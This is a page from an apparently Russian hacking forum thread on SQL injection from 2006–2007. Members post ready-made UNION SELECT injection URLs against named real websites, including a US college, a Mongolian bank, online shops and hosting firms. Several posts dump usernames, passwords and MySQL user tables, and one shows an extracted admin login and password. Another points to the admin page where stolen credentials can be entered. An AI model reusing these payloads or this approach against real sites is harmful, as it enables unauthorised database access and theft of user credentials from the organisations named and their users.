SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Произведение команды Sоlоx

    оч интересная базюка
    Code:
    http://www.flowers.kg/rus/index.php?mode=showother&id=-23+union+select+1,2,concat_ws(0x3a,table_name,table_schema,version(),database()),4+from+information_schema.tables
    там еще лежат заготовки к базам всех проектов этой студии ))

    хмм, только вот ничо путевого там не нашел
     
    1 person likes this.
  2. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    sbornikmp3.ru
    Code:
    http://www.sbornikmp3.ru/details.php?album=58869+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
    Прошелся по названием таблиц из соседней темы, не одной таблицы не подобрал
     
    2 people like this.
  3. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Oracle.

    www.bmcc.cuny.edu

    Версия:
    Code:
    http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,banner,1+from+v$version--&dep=
    CORE 10.1.0.3.0 Production
    NLSRTL Version 10.1.0.3.0 - Production
    Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
    PL/SQL Release 10.1.0.3.0 - Production
    TNS for Linux: Version 10.1.0.3.0 - Production

    Таблицы:
    Code:
    http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,table_name,1+from+sys.all_tables--&dep=
    интересная USERS

    Столбцы:

    Code:
    http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,column_name,1+from+sys.all_tab_columns--&dep=
    username, password

    Вытаскиваем:
    Code:
    http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,concat(username,concat(chr(59),password)),1+from+users--&dep=
    admin;lrc_01
     
    4 people like this.
  4. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+20,1/*
     
    1 person likes this.
  5. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Интернет-магазин парфюмерии Zemen :/
     
  6. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.ascon.ru/order.php?id=-11+union+select+1,2,table_name,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
    хостинг:
    Code:
    http://www.officinaweb.com/hosting.php?id=-5+union+select+1,2,3,4/*
     
    #3046 SWAT, 6 Sep 2007
    Last edited: 6 Sep 2007
  7. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    sharelita.com
    4.1.21-standard:test:eek:nkel_onkel@localhost
    Code:
    http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+users+--+
     
    2 people like this.
  8. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    На этом сайте уже обнаружена инекция
    http://forum.antichat.ru/showthread.php?p=438529#post438529

    ты просто нашёл на таком же файле,просто с больше количеством таблиц ;)
     
  9. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Code:
    http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.user/*
     
  10. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    новости шоубизнеса :)

    кому интересно копаем

    код:
    http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,version(),4,5,6,7+from+showbiz/*

    5.0.27-log
     
    1 person likes this.
  11. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    Code:
    http://www.umzug.cn/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
    Code:
    http://online-geldverdienen24.de/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
    Code:
    http://links.1a-chat.com/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
    Code:
    http://www.kaufguenstigerein.de/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
    Code:
    http://www.eliste.eu/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
     
    #3051 1NtR0, 8 Sep 2007
    Last edited: 8 Sep 2007
  12. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65

    Code:
    http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables/*
    работай лимитом ( limit ) +2 и т.д)
     
    #3052 KPOT_f!nd, 8 Sep 2007
    Last edited: 8 Sep 2007
  13. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://www.bioinnovit.com/scientist_model_agreements_contracts.php?mode=view&purchase_id='+union+select+1,user(),3,4,5,6,7,8,9,10,database(),version()+user/*
    Не могу подобрать поля
     
  14. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Odeon Film AG

    http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,concat(version(),char(58),database(),char(58),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+users/*
     
  15. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    _http://www.caac.org.au/pr/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*
     
    #3055 _-Ramos-_, 8 Sep 2007
    Last edited: 8 Sep 2007
    1 person likes this.
  16. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 RAUL07 Если ты не нашел куда подставить эти данные, то вот сюда. А вот что там я не знаю т.к. в немецком ноль (а это вроде немецкий).
    http://www.umzug.cn/start.php?go=in_admin
    Пока писал уже поменяли пост. Как удалить свой хз...
     
  17. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    http://ru-board.com
    Code:
    http://ru-board.com/new/article.php?sid=[sql]
    1 поле, blind-sql =\
     
    1 person likes this.
  18. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Code:
    http://www.cardholder.kz/index.php?p=-27+union+select+login,email,pwd,4,5,6,7,8,9,10,11,12,13,14+from+users/*
     
    _________________________
    1 person likes this.
  19. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    MONGOL POSTBANK
    Code:
    http://www.[COLOR=RoyalBlue]postbank[/COLOR].mn/eng/index.php?ac=news&newsid=650000%20union%20select%201,2,3,4,concat(user,char(58),password),6,7,8%20from%20mysql.user/*
     
    2 people like this.
  20. c001er*

    c001er* Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    20
    Likes Received:
    18
    Reputations:
    0
    http://www.alt.ac.uk/workshop_detail.php?e=-181+union+select+user(),2,3,4,5,6/*
     
    1 person likes this.
Thread Status:
Not open for further replies.